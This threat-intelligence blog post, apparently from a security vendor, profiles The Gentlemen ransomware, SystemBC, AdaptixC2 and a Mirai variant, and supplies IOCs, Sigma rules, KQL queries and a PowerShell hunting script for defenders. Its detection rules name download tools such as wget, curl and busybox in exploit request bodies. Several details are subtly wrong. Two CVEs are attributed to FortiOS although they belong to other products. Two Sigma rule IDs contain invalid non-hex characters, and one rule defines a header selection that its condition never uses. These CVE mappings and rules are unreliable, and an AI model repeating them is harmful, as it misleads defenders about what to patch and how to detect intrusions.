Back to Intelligence

The Gentlemen RaaS, SystemBC Proxy & AdaptixC2: OTX Pulse Analysis

SA
Security Arsenal Team
April 20, 2026
6 min read

Recent OTX pulses highlight a surge in sophisticated Ransomware-as-a-Service (RaaS) and post-exploitation activity. The primary threat actor, The Gentlemen, has aggressively expanded its operations, leveraging recent FortiOS vulnerabilities (CVE-2024-37085, CVE-2025-32463) for initial access and deploying SystemBC malware for covert C2 tunneling. Alongside this, the adoption of the AdaptixC2 framework—an open-source, modular post-exploitation tool supporting Beacon Object Files (BOFs)—is rising among APT groups. Simultaneously, IoT infrastructure remains under assault by the Nexcorium Mirai variant, which exploits TBK DVR devices (CVE-2024-3721) to build botnets for DDoS attacks. The collective objective of these campaigns is data exfiltration, credential theft, and operational disruption through multi-platform encryption and lateral movement.

Threat Actor / Malware Profile

The Gentlemen (RaaS)

  • Distribution: Primarily exploits vulnerabilities in public-facing applications, specifically FortiOS and FortiProxy. The group maintains a database of compromised devices to facilitate re-access.
  • Payload Behavior: Employs multi-platform lockers for Windows, Linux, NAS, BSD, and ESXi. Uses SystemBC for proxying traffic and Cobalt Strike for lateral movement. Tools like Mimikatz, AnyDesk, and PsExec are utilized for credential harvesting and remote administration.
  • C2 Communication: Utilizes SystemBC to establish encrypted tunnels, hiding malicious traffic behind legitimate-looking protocols.
  • Persistence: Likely via scheduled tasks and service installation (SystemBC).

AdaptixC2

  • Distribution: Dropped by initial access brokers or used directly by APT actors in post-exploitation phases.
  • Payload Behavior: Written in Go and C++, supports Windows, macOS, and Linux. Highly modular via Beacon Object Files (BOFs).
  • C2 Communication: Supports diverse channels including HTTP/S, TCP, mTLS, DNS, DoH, and SMB, all utilizing RC4 encryption.
  • Anti-Analysis: Modular nature allows easy swapping of components to evade signature detection.

Nexcorium (Mirai Variant)

  • Distribution: Exploits CVE-2024-3721 in TBK DVR devices via OS command injection.
  • Payload Behavior: Multi-architecture support (ARM, MIPS, x86-64). Designed for DDoS attacks.
  • Persistence: Modifies init configuration and utilizes watchdog scripts.

IOC Analysis

The pulses provide a mix of infrastructure and file-based indicators:

  • CVEs:
    • FortiOS: CVE-2024-37085, CVE-2025-32463, CVE-2024-55591.
    • TBK DVR: CVE-2024-3721.
    • Oracle Solaris: CVE-2020-14871.
    • RDP: CVE-2019-0708.
  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with The Gentlemen ransomware payload (e.g., 3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235), AdaptixC2 agents, and Nexcorium binaries.
  • IPv4: 176.65.148.186 (Nexcorium C2/Botnet).

Operational Guidance: SOC teams should immediately block the listed IP at the perimeter. File hashes should be uploaded to EDR solutions for threat hunting. Vulnerability management must prioritize patching FortiOS devices and TBK DVRs against the listed CVEs. Log analysis should focus on web server logs for exploit attempts and process logs for the execution of unsigned binaries commonly associated with SystemBC and Cobalt Strike.

Detection Engineering

Sigma Rules

YAML
title: Potential FortiOS Exploitation - The Gentlemen
id: 4829a5c0-6a7b-4b3c-9e0d-1f2a3b4c5d6e
description: Detects potential exploitation attempts against FortiOS vulnerabilities associated with The Gentlemen ransomware group (CVE-2024-37085, CVE-2025-32463).
status: experimental
date: 2026/04/20
author: Security Arsenal
logsource:
  category: web
detection:
  selection_uri:
    Uri|contains:
      - '/api/v2/mon/service/lookup'
      - '/remote/login'
      - '/api/v2/cmdb/system/admin'
  selection_exploit:
    RequestMethod: POST
  selection_headers:
    Headers|contains:
      - 'User-Agent: xmlrpc_pc'
      - 'Content-Type: application/'
  condition: selection_uri and selection_exploit
falsepositives:
  - Legitimate administration API calls
level: high
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2024.37085
  - cve.2025.32463
  - the.gentlemen

---
title: SystemBC Proxy Malware Activity
id: 5920b6d1-7b8c-5d4d-0f1e-2g3b4c5d6e7f
description: Detects potential SystemBC proxy malware activity often used by The Gentlemen affiliates for C2 tunneling. SystemBC often runs as a service and makes specific network connections.
status: experimental
date: 2026/04/20
author: Security Arsenal
logsource:
  category: process_creation
detection:
  selection_img:
    Image|endswith:
      - '\svchost.exe'
      - '\rundll32.exe'
  selection_cli:
    CommandLine|contains:
      - '-socks'
      - '-proxy'
      - '127.0.0.1:'
  selection_network:
    DestinationPort:
      - 443
      - 8080
      - 8443
  condition: all of selection_*
falsepositives:
  - Legitimate proxy software
level: high
tags:
  - attack.command_and_control
  - attack.t1071
  - systembc
  - the.gentlemen

---
title: TBK DVR Exploitation - Nexcorium Mirai Botnet
id: 6a30c7e2-8c9d-6e5e-1g2f-3h4c5d6e7f8g
description: Detects exploitation attempts against TBK DVR devices (CVE-2024-3721) associated with the Nexcorium Mirai variant.
status: experimental
date: 2026/04/20
author: Security Arsenal
logsource:
  category: web
detection:
  selection_uri:
    Uri|contains:
      - '/TBK'
      - '/dvr/'
      - '/device.rsp'
  selection_payload:
    HttpRequestBody|contains:
      - 'busybox'
      - 'wget'
      - 'curl'
  condition: selection_uri and selection_payload
falsepositives:
  - Unknown
level: critical
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2024.3721
  - nexcorium
  - mirai

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Gentlemen and SystemBC related file hashes
DeviceFileEvents
| where SHA256 in (
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2",
    "89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400"
)
| project Timestamp, DeviceName, FolderPath, SHA256, InitiatingProcessAccountName

// Hunt for Nexcorium C2 IP connections
DeviceNetworkEvents
| where RemoteIP == "176.65.148.186"
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell
# Hunt for Gentlemen Ransomware and AdaptixC2 Indicators
$TargetHashes = @(
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "adf675ffc1acb357f2d9f1a94e016f52", # MD5 from Pulse 1
    "f212fd00d9ffc0f3d868845f7f4215cb"  # MD5 from Pulse 2 (AdaptixC2)
)

Write-Host "Scanning for The Gentlemen and AdaptixC2 artifacts..."

# Scan C: drive for matching file hashes
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($TargetHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

# Check for SystemBC Service Pattern (Common persistence)
$services = Get-WmiObject -Class Win32_Service -ErrorAction SilentlyContinue
foreach ($svc in $services) {
    if ($svc.PathName -like "*proxy*" -or $svc.PathName -like "*socks*" -or $svc.Name -like "*SystemBC*") {
        Write-Host "[!] SUSPICIOUS SERVICE DETECTED: $($svc.Name) - Path: $($svc.PathName)" -ForegroundColor Yellow
    }
}

Response Priorities

  • Immediate:

    • Block the IOCs (IP 176.65.148.186) at the network perimeter.
    • Scan all endpoints for the SHA256 hashes associated with The Gentlemen and AdaptixC2.
    • Patch FortiOS/FortiGate devices against CVE-2024-37085 and CVE-2025-32463 immediately.

  • 24 Hours:

    • Initiate credential resets for accounts that may have been accessed via compromised FortiGate VPNs or exposed via Mimikatz usage.
    • Review logs for evidence of AnyDesk or PsExec usage (Pulse 3) which indicates active lateral movement.

  • 1 Week:

    • Isolate and patch TBK DVR devices and IoT endpoints to prevent Nexcorium botnet recruitment.
    • Implement network segmentation to limit the spread of SystemBC proxy traffic.
    • Review VPN and remote access logs for anomalous login times or locations consistent with The Gentlemen TTPs.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsthe-gentlemenadaptixc2systembcmirairansomware-as-a-service

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action